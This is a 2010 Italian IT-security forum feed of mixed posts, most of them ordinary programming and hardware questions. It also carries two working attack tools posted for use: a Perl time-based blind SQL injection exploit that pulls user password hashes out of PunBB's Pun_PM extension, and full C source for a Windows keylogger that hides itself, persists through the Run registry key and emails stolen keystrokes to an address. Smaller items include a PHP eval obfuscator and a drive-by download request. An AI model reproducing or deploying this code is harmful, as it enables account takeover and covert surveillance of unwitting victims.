Forum di Sicurezza Informatica IT Security - Infernet.ws - Tutti i forum

Latin.it bypass, una luce negli occhi degli studenti

Thu, 29 Jul 2010 21:48:01 +0200

Se andate come me allo scientifico (o per lo meno ci siete stati) vi sarete accorti di che rottura di palle sia fare le versioni di latino. Fortunatamente esistono siti come latin.it che offrono delle traduzioni decenti e risparmiano un bel po' di lavoro. Il problema nasce quando questi siti mettono un limite di 5 brani visualizzabili al giorno limite non sostenibile per chi copia come si deve

http://pastebin.com/GSnfmTbE

Si, sto prendendo la buona abitudine di scrivere la documentazione di ogni cagata che faccio lol

P.S.
chi segnala è gay

[extjs]problema expander row

Thu, 29 Jul 2010 16:58:25 +0200

Codice:

storeInnerGrid.on('load', function() {

                    debugger;

                    var pippo = Ext.get('remData' + index);

                    innerGrid.getColumnModel().setHidden(0, true);

                    Ext.get('remData' + index).child('div.loading-indicator').remove();

                    innerGrid.render(Ext.get('remData' + index));

                    var colSize = grid.getColumnModel().getColumnWidth(3);

                    for (k = 2; k < 33; k++) {

                    innerGrid.getColumnModel().setColumnWidth(k, colSize);

                    }

                    innerGrid.getEl().swallowEvent(

                    [ 'mousedown', 'mouseup', 'click', 'contextmenu', 'dblclick', 'mousemove' ]);

                    innerGrid.doLayout();

                    });

in pratica l'applicazione s'impalla a questo punto qua dicendo "null is null or not an object"

Codice:

innerGrid.render(Ext.get('remData' + index));

io non ho molta esperienza con extjs anzi questa è praticamente la prima volta che lo uso...questi 5-6 righe di codice fanno parte di un file che c'ha 1700 righe e il tutto senza manco un commento.
ho provato a chiedere spiegazioni all'autore di questo capolavoro ma manco lui mi sa dire perche si impalla.
se avete bisogno di qualche informazioni in piu ditemelo.
grazie

PHP Code Packer And Obfuscator By BrainStorm

Wed, 28 Jul 2010 20:15:14 +0200

Codice:

/*

PHP CODE PACKER AND OBFUSCATOR BY BrainStorm

Istructions:

1. Save this snippet as encrypt.php

2. Save PHP code (without  tag) in decoded.txt

3. Execute this script (visit encrypt.php in a web browser or do php encrypt.php in the shell)

4. Open decoded.php, (visit encoded.php in a web browser or do php encoded.php in the shell)

*/

echo "\nPHP Code Packer and Obfuscator by BrainStorm 
\n";

$fp1 = fopen ("decoded.txt", "r");

$contents = fread ($fp1, filesize ("decoded.txt"));

fclose($fp1);

$fp2 = fopen("encoded.php","w");

fwrite($fp2, "
fwrite($fp2, 'eval(gzinflate(base64_decode(str_replace("\\n",\'\',\'');

fwrite($fp2, chunk_split(base64_encode(gzdeflate(trim($contents), 9)), 80, "\r\n"));

fwrite($fp2, "'))));\r\n");

fwrite($fp2, "?>");

fclose($fp2);

echo "
File encoded.php creato con successo!!!\n";

?>

Commenti o domande sono ben accetti.

Rivelato l'algortimo Chaocipher !!!

Tue, 27 Jul 2010 14:10:59 +0200

è dal 1918 che il mondo ci sta sbattendo la testa

John F. Byrne ha sviluppato l'algoritmo (finora segreto) e ha rilasciato vari testi in chiaro con i corrispondenti testi cifrati, sfidando tutti a comprendere l'algoritmo.

inutile dire che nessuno ce l'ha fatta.

il 1 luglio di questo mese, gli eredi di Byrne hanno donato la macchina cifrante al National Cryptological Museum, così l'algoritmo è saltato fuori, dopo 92 anni!

ecco una descrizione completa e semplice dell'algoritmo:

http://www.mountainvistasoft.com/chaocip...orithm.pdf

enjoy

[EDIT]
l'algoritmo in perl presentato nel paper è lunghissimo (ha la decifrazione e una marea di controlli). però mi sono divertito ha riscrivere una versione semplificata, senza la decifrazione e senza controlli, con gli alfabeti iniziali inseriti direttamente nel source, per un totale di 400 righe in meno. anche la sintassi perl non è delle migliori, ma ripeto, l'ho scritto just for fun.

Codice:

#!/usr/bin/perl

$CT = "CEDQRSTIXYLMOPZABFVGUHWJKN";

$PT = "ayzbqdsefghlwinkcmoprtuvjx";

@cttrans = (0, 2..13, 1, 14..25);

@pttrans = (1, 2, 4..14, 3, 15..25, 0);

@ctarr = split //,$CT;

@ptarr = split //,$PT;

print "\n> ";

$in = <>;

chomp $in;

@inarr = split //,$in;

for $j (0..$#inarr) {

for $k (0..$#ptarr) {

if ("$inarr[$j]" eq $ptarr[$k]) {$out .= $ctarr[$k]; $p = $k;}

}

for $t (0..25) {

$ctarr2[$t] = $ctarr[($p+$cttrans[$t])%26];

$ptarr2[$t] = $ptarr[($p+$pttrans[$t])%26]

}

@ctarr = @ctarr2; @ptarr = @ptarr2;

}

print "\n> $out\n";

PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit

Tue, 27 Jul 2010 14:04:06 +0200

Codice:

#!/usr/bin/perl

# [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit

# Author/s: Dante90, WaRWolFz Crew

# Created: 2009.07.30 after 0 days the bug was discovered.

# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat

# Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,

#               Chuzz, init, plucky, SaRtE, Lupo

# Thanks For Testing: BlAcK HaT, l3d

# Web Site: www.warwolfz.org

# My Wagend (Dante90): dante90wwz.altervista.org

# Unit-X Project: www.unitx.net

# ----

# Why I've decided to publish this?

# Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.

# ----

# DETAILS

# ./PunBB v1.3.*/extensions/pun_pm/functions.php

# LINES: 504 -> 526

#    function pun_pm_edit_message()

#    {

#        global $forum_db, $forum_user, $lang_pun_pm;

#

#        $errors = array();

#

#        // Verify input data

#        $query = array(

#            'SELECT'    => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',

#            'FROM'        => 'pun_pm_messages m',

#            'JOINS'        => array(

#                array(

#                    'LEFT JOIN'        => 'users AS u',

#                    'ON'            => '(u.id = m.receiver_id)'

#                ),

#            ),

#            'WHERE'        => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'

#        );

#

#        ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;

#

#        $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);

# ----

# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'

# Error - PunBB

# An error was encountered

# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php

# Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).

use strict;

use warnings;

use LWP::UserAgent;

use HTTP::Cookies;

use HTTP::Request::Common;

use Time::HiRes;

use IO::Socket;

my ($UserName,$PassWord,$ID) = @ARGV;

if (@ARGV < 3) {

    &usage();

    exit();

}

my $Message = "";

my $Hash = "";

my ($Time,$Time_Start,$Time_End,$Response);

my ($Start,$End);

my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);

my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link

my $Method = HTTP::Request->new(GET => $Host);

my $Cookies = new HTTP::Cookies;

my $HTTP = new LWP::UserAgent(

            agent => 'Mozilla/5.0',

            max_redirect => 0,

            cookie_jar => $Cookies,

        ) or die $!;

my $Referrer = "http://www.warwolfz.org/";

my $DefaultTime = request($Referrer);

sub request {

    $Referrer = $_[0];

    $Method->referrer($Referrer);

    $Start = Time::HiRes::time();

    $Response = $HTTP->request($Method);

    $Response->is_success() or die "$Host : ", $Response->message,"\n";

    $End = Time::HiRes::time();

    $Time = $End - $Start;

    return $Time;

}

sub Blind_SQL_Jnjection {

    my ($dec,$hex) = @_;

    return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";

}

sub Clear() {

    my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';

    return system($launch);

}

sub Login() {

    if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {

        $Cookies->proxy(['http', 'ftp'], 'http://'.$ARGV[4]) or die $!;

    }

    my $Get = $HTTP->get($Host.'login.php');

    my $csrf_token = "";

    if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input

        $csrf_token = $1;

    }

    my $Login = $HTTP->post($Host.'login.php',

                [

                    form_sent        => '1',

                    redirect_url    => $Host.'login.php',

                    csrf_token        => $csrf_token,

                    req_username    => $UserName,

                    req_password    => $PassWord,

                    save_pass        => '1',

                    login => 'Login',

                ]) || die $!;

    if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.

        return 1;

    } else {

        return 0;

    }

}

sub usage {

    Clear();

    {

        print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";

        print " ------------------------------------------------------ \n";

        print " * USAGE:                                             *\n";

        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";

        print " * perl name_exploit.pl [username] [password] [id]    *\n";

        print " * [proxy] is optional (ex: 151.57.4.97:8080)         *\n";

        print " ------------------------------------------------------ \n";

        print " *         Powered By Dante90, WaRWolFz Crew          *\n";

        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";

        print " ------------------------------------------------------ \n";

    };

    exit;

}

sub refresh {

    Clear();

    {

        print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";

        print " ------------------------------------------------------ \n";

        print " * USAGE:                                             *\n";

        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";

        print " * perl name_exploit.pl [username] [password] [id]    *\n";

        print " * [proxy] is optional (ex: 151.57.4.97:8080)         *\n";

        print " ------------------------------------------------------ \n";

        print " *         Powered By Dante90, WaRWolFz Crew          *\n";

        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";

        print " ------------------------------------------------------ \n";

    };

    print $_[0] ."\n";

    print " * Victime Site: " . $_[1] . "\n";

    print " * Default Time: " . $_[2] . " seconds\n";

    print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";

    print " * BruteForcing N Char Hash: " . $_[6] . "\n";

    print " * SQL Time: " . $_[5] . " seconds\n";

    print " * Hash: " . $_[4] . "\n";

}

sub Main(){

    if (Login() == 1) {

        $Message = " * Logged in as: ".$UserName;

    } elsif (Login() == 0) {

        $Message = " * Login Failed.";

        refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");

        print " * Exploit Failed                                     *\n";

        print " ------------------------------------------------------ \n";

        exit;

    }

    for (my $I=1; $I<=40; $I++) { #N Hash characters

        for (my $J=0; $J<=15; $J++) { #0 -> F

            $Time_Start = time();

            my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));

            $Time_End = time();

            $Time = request($Referrer);

            refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);

            if ($Time_End - $Time_Start > 6) {

                $Time = request($Referrer);

                refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);

                if ($Time_End - $Time_Start > 6) {

                    syswrite(STDOUT,chr($chars[$J]));

                    $Hash .= chr($chars[$J]);

                    $Time = request($Referrer);

                    refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);

                    last;

                }

            }

        }

        if ($I == 1 && length $Hash < 1 && !$Hash) {

            print " * Exploit Failed                                     *\n";

            print " ------------------------------------------------------ \n";

            exit;

        }

        if ($I == 40) {

            print " * Exploit Successfully Executed                      *\n";

            print " ------------------------------------------------------\n ";

            system("pause");

        }

    }

}

Main();

#WaRWolFz Crew

Dante

[Monitor-Tv-Lcd] Schermo Nero Dopo Qualche Secondo.

Tue, 27 Jul 2010 10:55:35 +0200

Ciao a tutti, ho un problema penso serio con il Samsung Sync Master 932mw (multifunzione: lcd-tv-monitor).
Praticamente quando lo accendo lo schermo rimane acceso qualche secondo (vedo tipo il messaggio "segnale assente" se non attacco nulla) poi si spegne (schermo nero). Però il led blu sul pulsante di accensione rimane acceso.

Grazie
Spero in un vostro aiuto.

StarCraft II

Tue, 27 Jul 2010 09:05:20 +0200

Da oggi è disponibile StarCraft II

Ciauz

[js]scaricamento automatico

Mon, 26 Jul 2010 17:10:17 +0200

ciao ragazzi

vorrei sapere se è possibile scrivere uno script in modo che visitando una pagina dove esso è contenuto permette il collegamento e quindi lo scaricamento automatico(senza che l'utente clicchi su qualche apposito link) di un programma.

Macro semplice semplice

Sun, 25 Jul 2010 22:12:35 +0200

Raga non sapevo proprio dove aprire questa discussione quindi l'ho aperta qua, in caso spostate!
Mi serve un programma per creare una macro (a mio parere) molto semplice cioè di premere i tasti " f1 ; 2 ; 1 " ho provato actool ma non mi funziona sulla finestra su quale voglio scrivere ma solo sui file di scrittura, ho anche provato hotkey ma non ho ben capito come funziona. Quindi vi chiedi di consigliami un bel programma per creare la macro che vi ho detto sopra e se già lo avete provato di farmi lo script, grazie!
EDIT.ora che ci penso non è tanto semplice perchè tra una sequenza e l'altra ci deve lasciare 4-5 secondi!

[php] Browsergame in sviluppo

Fri, 23 Jul 2010 22:36:16 +0200

E salve ragazzi, negli ultimi mesi mi sono fissato di voler programmare un browser game con delle palle talmente gradi da sfondare la sedia..!

Dopo alcuni mesi di lavori estenuanti, il 99.9999% del lavoro tutto da solo, mi sono accorto di aver perso ormai anche i denti! E' diventato troppo grande come progetto da portare avanti da solo... quindi... mi stavo chiedendo.. se qualcuno è disposto a portate avanti questo progetto con me.. Ci sono alcuni punti da sottolineare..

1) Il progetto è serio, e gratuito, ma punto cmq a guadagnarci (pubblicità e account premium)

2) Il compare che mi aiuterà, non lavora per beneficenza, ma riceverà una retribuzione in Ca$h in base al lavoro svolto (dai ricavi utili)..

Che titolo ha? Di che parla?
Titolo? non ne ha...
E' un RPG Fantasy (credo ) in pratica hai il tuo pg e puoi scorrazzare tra vari luoghi, uccidere creature, guadagnare, fare carriera, puzzare, mangiare, uccidere amici... e ogni tanto cè anche qualche chat pulciosa (in ajax èèè xD)..

Evitiamo di confonderci, non è un RPG basato sulla Chat di gruppo (mi fanno deprimere )..

*La programmazione utilizzata non è ad oggetti..
èh non l'ho ancora imparata..

che altro dire... per ora ho bisogno di aiuto sia pratico che teorico sulle battaglie, devono essere capaci di supportare scontri sia contro creature sia in PvP, in più il player ha la possibilità di utilizzare Spell e Oggetti..
Quelle che ho scriptato io non sono la fine del mondo.. ho speso la metà del tempo solo su di esse, mi fanno solo bestemmiare..
A chi interessa mostro altri dettagli..
Questa è una prova del BG [ non sono spam! ] non è l'ultima versione.. (alcune immagini credo non si visualizzino, scusate errori ortografici e magari di codifica)...!
*Non fate commenti sulla grafica*

Un saluto dal pazzo trigge.

[C] Keylogger (windows)

Fri, 23 Jul 2010 18:55:32 +0200

Qualche giorno di noia e ho sfornato questo keylogger, sembra funzionare perfettamente tranne per un piccolo incovenite: le mail vengono individuate come spam e archiviate in posta indesiderata.
Mi sembra di aver scritto codice abbastanza leggibile ma se avete domande chiedete pure.

Codice:

#define IP "85.18.95.132" // mail server (smtp.fastwebnet.it) 

#define DOOR 25           // SMTP door

#define FROM "shifterskeylogger@stealingdata.net"

#define TO "binaryincubus@live.it" // Here your mail

#define SUBJECT "Stealed Data"

#define _MAX_CHAR 500

Fra le prime righe potete scegliere che server smtp utilizzare mentre subito dopo potete configurarlo perché mandi alla vostra mail i log. Il buffer viene inviato ogni 500 caratteri ma potete alzarlo o abbassarlo secondo le vostre preferenze.

Vi ricordo che dovete aggiungere le dipendenze delle winsock al compilatore:

Codice:

-lwsock32

Have fun

Codice:

#include 

#include 

#if defined ( unix )

    #error The operative system have to be Winzoz

#endif

#include 

#ifndef WIN32_LEAN_AND_MEAN

    #define WIN32_LEAN_AND_MEAN

#endif

inline unsigned get_len ( char * str );

int send_mail ( char * subject, char * message, char * to, char * from, const char ip [ 17 ], int door );

int take_n_run ( int, char * );

typedef void ( _stdcall * RtlSetProcessIsCritical ) ( IN BOOLEAN New, OUT PBOOLEAN Old, IN BOOLEAN Log );

int protectProcess ( void );

void regApp ( void );

int hideConsole ( void );

#define IP "85.18.95.132" // smtp.fastwebnet.it mail server

#define DOOR 25           // SMTP Door

#define FROM "shifterskeylogger@stealingdata.net"

#define TO "binaryincubus@live.it" // Here your mail

#define SUBJECT "Stealed Data"

#define _MAX_CHAR 500

int main ( void )

{

    register short i;

    char * data = ( char * ) calloc ( _MAX_CHAR + 12, sizeof ( char ) );

    regApp ( );

    protectProcess ( );

    hideConsole ( );

    while ( 1 ) {

        while ( get_len ( data ) < _MAX_CHAR )

        {

            for ( i = 8 ; i <= 190 ; i++ )

            {

                if ( GetAsyncKeyState ( i ) == -32767 ) {

                    take_n_run ( i, data);

                }

            }

            Sleep(10);

        }

        send_mail ( SUBJECT, data, TO, FROM, IP, DOOR  );

        memset ( data, 0, _MAX_CHAR + 12 );

    }

    return 0;

}

// Simple Mail Transfer Protocol

#define _OPEN     "HELO default\r\n"\

                "MAIL FROM: <"

#define _RCPT      ">\r\nRCPT TO: <"

#define _DATA      ">\r\nDATA\r\n"\

                "From: <"

#define _SUB     ">\r\nSubject: "

#define _NEWLINE    "\r\n\r\n"

#define _CLOSE    "\r\n.\r\n"\

                "QUIT\r\n"

inline unsigned get_len ( char * str ) {

    return ( unsigned ) ( strlen ( str ) * sizeof ( char ) );

}

int send_mail ( char * subject, char * message, char * to, char * from, const char ip [ 17 ], int door )

{

    int sock;

    struct sockaddr_in saddr;

    WSADATA wsadata;

    if ( WSAStartup ( MAKEWORD ( 2, 2 ), & wsadata ) != 0 ) {

        return -1;

    }

    if ( ( sock = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0) {

        return -1;

    }

    saddr . sin_family = AF_INET;

    saddr . sin_addr . s_addr = inet_addr ( ip );

    saddr . sin_port = htons ( door );

    if ( connect ( sock, ( struct sockaddr * ) & saddr, sizeof ( saddr ) ) < 0 ) {

        return -1;

    }

    size_t check_size = get_len ( _OPEN );

    if ( check_size != send ( sock, _OPEN, check_size, 0 ) ) {

        return -1;

    }

    check_size = get_len ( from );

    if ( check_size != send ( sock, from, check_size, 0 ) ) {

        return -1;

    }

    check_size = get_len ( _RCPT );

    if ( check_size != send ( sock, _RCPT, check_size, 0 ) ) {

        return -1;

    }

    check_size = get_len ( to );

    if ( check_size != send ( sock, to, check_size, 0 ) ) {

        return -1;

    }

    check_size = get_len ( _DATA );

    if ( check_size != send ( sock, _DATA, check_size, 0 ) ) {

        return -1;

    }

    check_size = get_len ( from );

    if ( check_size != send ( sock, from, check_size, 0 ) ) {

        return -1;

    }

    check_size = get_len ( _SUB );

    if ( check_size != send ( sock, _SUB, check_size, 0 ) ) {

        return -1;

    }

    check_size = get_len ( subject );

    if ( check_size != send ( sock, subject, check_size, 0 ) ) {

        return -1;

    }

    check_size = get_len ( _NEWLINE );

    if ( check_size != send ( sock, _NEWLINE, check_size, 0 ) ) {

        return -1;

    }

    check_size = get_len ( message );

    if ( check_size != send ( sock, message, check_size, 0 ) ) {

        return -1;

    }

    check_size = get_len ( _CLOSE );

    if ( check_size != send ( sock, _CLOSE, check_size, 0 ) ) {

        return -1;

    }

    closesocket ( sock );

    WSACleanup ( );

    return 0;

}

int take_n_run ( int key, char * buffer )

{

    switch ( key ) {

        case 8 :

            strcat ( buffer, "[b]" );

            return 0;

        case 13 :

            strcat ( buffer, "\n" );

            return 0;

        case 32 :

            strcat ( buffer, " " );

            return 0;

        case VK_TAB :

            strcat ( buffer, "[T]" );

            return 0;

        case VK_SHIFT :

            strcat ( buffer, "[S]" );

            return 0;

        case VK_CONTROL :

            strcat ( buffer, "[C]" ) ;

            return 0;        

        case VK_ESCAPE :

            strcat ( buffer, "[ES]" );

            return 0;

        case VK_END :

            strcat ( buffer, "[EN]" );

            return 0;

        case VK_HOME :

            strcat ( buffer, "[H]" );

            return 0;

        case VK_LEFT :

            strcat ( buffer, "[L]" );

            return 0;

        case VK_RIGHT :

            strcat ( buffer, "[R]" );

            return 0;

        case VK_UP :

            strcat ( buffer, "[u]" );

            return 0;

        case VK_DOWN :

            strcat ( buffer, "[D]" );

            return 0;

        case 110 :

        case 190 :

            strcat ( buffer, "." );

            return 0;

        default:

            strcat ( buffer, ( char * ) & key );

    }

    return 0;

}

#define CONSOLE_NAME "Secure"

int hideConsole ( void )

{

   if ( ! SetConsoleTitle ( CONSOLE_NAME ) ) {

        return -1;

   }

   HWND thisWindow;

   thisWindow = FindWindow( NULL, CONSOLE_NAME );

   ShowWindow ( thisWindow, 0 );

   return 0;

}

#define FAKE_NAME "\\secure.exe"

#define FAKE_KEY "Secure Internet"

void regApp ( void ) 

{

   char system_ [ MAX_PATH ];

   char pathToFile[ MAX_PATH ];

   HMODULE getMod = GetModuleHandle ( NULL );

   GetModuleFileName ( getMod, pathToFile, sizeof  ( pathToFile ) );

   GetSystemDirectory ( system_, sizeof ( system_ ) );

   strcat ( system_, FAKE_NAME );

   CopyFile ( pathToFile, system_, 0);

   HKEY key_;

   RegOpenKeyEx ( HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, & key_ );

   RegSetValueEx ( key_, FAKE_KEY, 0, REG_SZ, ( const unsigned char * ) system_, sizeof ( system_ ) );

   RegCloseKey ( key_ );

}

int protectProcess ( void )

{

    int enablePriv ( const char * szPriv );

    HANDLE DLL;

    RtlSetProcessIsCritical setCritical;

    DLL = LoadLibraryA ( "ntdll.dll" );

    if ( DLL == NULL ) {

        return -1;

    }

    if ( enablePriv ( SE_DEBUG_NAME ) < 0 ) {

        return -1;

    }

    setCritical = ( RtlSetProcessIsCritical ) GetProcAddress( ( HINSTANCE ) DLL, "RtlSetProcessIsCritical" );

    if ( ! setCritical ) {

        return -1;

    }

    setCritical ( 1, 0, 0 );

    return 0;

}

int enablePriv ( const char * szPriv )

{

    HANDLE token;

    LUID luid;

    TOKEN_PRIVILEGES privs;

    memset ( &privs, 0, sizeof ( privs ) );

    if ( ! OpenProcessToken ( GetCurrentProcess ( ), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, & token ) ) {

       return -1;

    }

    if ( ! LookupPrivilegeValue ( NULL, szPriv, & luid ) )

    {

        CloseHandle ( token );

        return -1;

    }

    privs . PrivilegeCount = 1;

    privs . Privileges [ 0 ] . Luid = luid;

    privs . Privileges [ 0 ] . Attributes = SE_PRIVILEGE_ENABLED;

    if ( ! AdjustTokenPrivileges ( token, FALSE, & privs, sizeof ( privs ), NULL, NULL ) ) {

                        return -1;

    }

    CloseHandle ( token );

    return 0;

}

Se volete provarlo vi conviene utilizzare Sandbox o commentare le seguenti linee che introducono le funzioni più dannose:

Codice:

    //regApp ( );

    //protectProcess ( );

    //hideConsole ( );

PNG e messaggio nascosto

Fri, 23 Jul 2010 09:20:24 +0200

Buongiorno a tutti, qualche giorno fa un mio amico mi ha chiesto un suggerimento relativo ad un file inviatogli.
Questo file è una png nella quale, a detta di chi l'ha inviata, ci dovrebbe essere un messaggio di qualche tipo.
Non sono riuscito ad aiutarlo, ma non riesco a levarmi dalla testa quella maledetta immagine e il fatto di non esservi riuscito. Peraltro non posto l'immagine perchè non cerco qualcuno che risolva il problema al posto mio, perderei tutto il gusto.
Non avendo alcun tipo di esperienza, ho fatto i seguenti tentativi (dopo essermi documentato):

- Esame dei livelli (essendo una PNG)
- Apertura con editor esadecimale
- Estrazione con software di steganografia

In particolare non ho trovato software che trattassero le png con la stessa facilità con cui trattano le jpeg. Di mio continuo a pensare ci siano dati mancanti al problema, ovvero un'eventuale password per la decifrazione.
Nel frattempo di una vostro eventuale consiglio, vi ringrazio.

swfBomb

Thu, 22 Jul 2010 05:10:23 +0200

O sono scemo io di brutto, oppure quelli di swftool sono scimmie ubriache e non hanno dato un'opzione per estrarre da un swf TUTTO in una volta sola.

E così, ho fatto un semplice script che estrae tutto da un swf (usando swfexstract). La parte divertente è che appena l'ho finito mi sono scordato cosa dovevo farci, e quindi per dargli un senso l'ho abbellito con un po' di cazzate ed eccolo qua.

http://sprunge.us/KWVN?rb

il todo sta lì solo per dire "sì lo so che si può migliorare e tanto, è che non ho voglia".

EDIT: Inutile dire che vi serve swfextract, che sta nel pacchetto swftools

[C++] Liste

Wed, 21 Jul 2010 09:20:17 +0200

Una classe che ho scritto per esercizio e utilità anche se esiste già quella nelle librerie standard.

list.h

Codice:

#ifndef LIST_H

#define LIST_H

template < class type >

class list

{

    class elem

    {

    public:

    elem ( )

    {

        next = 0;

    }

    ~elem ( )

    {

    }

    elem * next;

    type value;

    };

    public:

    list ( ) :

    size(0)

    {

    first = 0;

    last = 0;

    }

    ~list ( )

    {

    elem * tmp;

    while ( first )

    {

        tmp = first;

        first = first -> next;

        delete tmp;

    }

    }

    void insert_back ( type );

    void insert ( type, int );

    void erase ( int );

    type & firstValue ( )

    {

    return first -> value;

    }

    type & lastValue ( )

    {

    return last -> value;

    }

    type & operator[] ( unsigned int );

    void operator<< ( type );

    void operator>> ( type & );

    unsigned lenght ( void )

    {

    return size;

    }

    private:

    elem * last;

    elem * first;

    unsigned int size;

};

#endif

list.cpp

Codice:

#include "list.h"

template < class type >

void list < type > :: insert ( type toInsert, int position )

{

    if ( size == 0 )

    throw "You have to create an element before";

    if ( ( unsigned ) position > size )

    throw "Element before does not exist";

    elem * ptr = first;

    while ( position-- )

    ptr = ptr -> next;

    elem * newElem = new elem;

    newElem -> value = toInsert;

    newElem -> next = ptr -> next;

    ptr -> next = newElem;

    size++;

}

template < class type >

void list < type > :: insert_back ( type toInsert )

{

    elem * newElem= new elem;

    newElem -> value = toInsert;

    newElem -> next = first;

    first = newElem;

    size++;

}

template < class type >

void list < type > :: erase ( int position )

{

    if ( position >= size )

    throw "Element before does not exist";

    elem * ptr = first;

    if ( position == 0 )

    {

    first = ptr -> next;

    delete ptr;

    }

    else

    {

    for ( ; --position > 0 ; )

        ptr = ptr -> next;

    elem * tmp = ptr -> next -> next;

    delete ptr -> next;

    ptr -> next = tmp;

    }

    size--;

}

template < class type >

void list < type > :: operator<< ( type toInsert )

{

    elem * number = new elem;

    number -> value = toInsert;

    if ( size == 0 )

    {

    first = number;

    last = number;

    }

    else

    {

    last -> next = number;

    last = number;

    }

    size++;

}

template < class type >

void list < type > :: operator>> ( type & in )

{

    if( size == 0 )

    throw "List not initialized";

    in = last -> value;

    this -> erase ( size - 1 );

}

template < class type >

type & list < type > :: operator[] ( unsigned int index )

{

    if ( index >= size )

    throw "Elem before does not exist";

    elem * ptr = first;

    while ( index-- )

    ptr = ptr -> next;

    return ptr -> value;

}

shoutbox non funzionante

Tue, 20 Jul 2010 14:43:54 +0200

sono un paio di giorni che la shoutbox non si carica completamente.

non ho nessuno blocco js attivato

diapositive col wiimote

Tue, 20 Jul 2010 13:59:24 +0200

oggi avevo voglia di fare qualcosa di figo e lo fatto ho collegato il wimote all pc e ho usato GlovePIE per fare questo semplice script http://pastebin.org/388332 si posso usare anche i sensori di movimento del wiimote ma non avevo voglia lo scrpit e facilissimo adesso vedro di fare qualcosa di piu FIGO

Policy certificato su smart card

Mon, 19 Jul 2010 10:26:29 +0200

Spero di non essere off topics con questa mia domanda, e abbiate pazienza per la mia ignoranza in materia e la scarsa precisione dell'utilizzo delle parole.

Ho necessità di accedere ad un server web, la comunicazione è crittata (https), inoltre, al fine di garantire un maggiore livello di sicurezza, per accedere al server devo essere in possesso di una smart card e relativo certificato digitale (rilasciati da ArubaPEC), la cui chiave pubblica è stata trasmessa ai gestori del server.
Pertanto al login devo inserire smart card nel lettore, selezionare il certificato (sulla carta ce ne stanno 2), digitare il PIN corretto, in seguito faccio login (username e password, as usual).
L'utilizzo del sistema remoto tuttavia è molto lento, in quanto, a detta degli amministratori della sicurezza, prima dell'invio (da server ad host) di qualunque componente (codice html, immagini, ecc.) il server verifica l'autenticità del certificato! Quindi non solamente al login, cosa che mi sembra più normale, ma ad ogni risposta del server questo accede ad ArubaPEC per fare una verifica (cosa verifichi non lo so con precisione, forse una CRL?). Da qui la lentezza di tutto il sistema.

A me questo modo di procedere sembra piuttosto strano... Si tratta di una policy standard?
Si consideri infine che questo sistema di accesso (server https+certificato digitale su smart card) è stato allestito anche da altri due soggetti, ma la verifica del certificato ha luogo solamente al login. Ed infatti l'utilizzo è molto più rapido.

E' sbagliato allestire un meccanismo simile, oppure ognuno è libero di decidere la propria policy a piacere? Inoltre: la verifica dell'autenticità del certificato (o qualunque cosa faccia) fatta solamente al login espone davvero il sistema a delle vulnerabiità?

Grazie mille per ogni risposta e spiegazione,
aloha

Guida pratica alla programmazione in C - reloaded

Sun, 18 Jul 2010 12:54:04 +0200

Dopo diverse segnalazioni di piccoli errori nella mia guida ho deciso di darle una piccola rimessa a nuovo, correggendo gli errorini presenti qua e là, modificando il modo in cui illustro certi argomenti e aggiungendo un nuovo capitolo con cenni di programmazione a oggetti.
La guida può essere scaricata sempre dal solito link: http://0x00.ath.cx/guidac.pdf .

PlIB - PerL IrcBot

Sat, 17 Jul 2010 19:01:13 +0200

Salve a tutti!
Sono qui per presentarvi la mia ultima creazione, PlIB..
Cosa è PlIB? PlIB (Pi elle i bi) è un ircbot modulare scritto in Perl, rfc-compliant e con supporto ad SSL.

Resta a voi scoprirlo completamente.. questo è un esempio di usage:

Codice:

#!/usr/bin/perl

###############################################################

# @name..................................................plib #

# @realname.......................................PerL IrcBot #

# @author............................................Robertof #

# @mail.....................................robertof@anche.no #

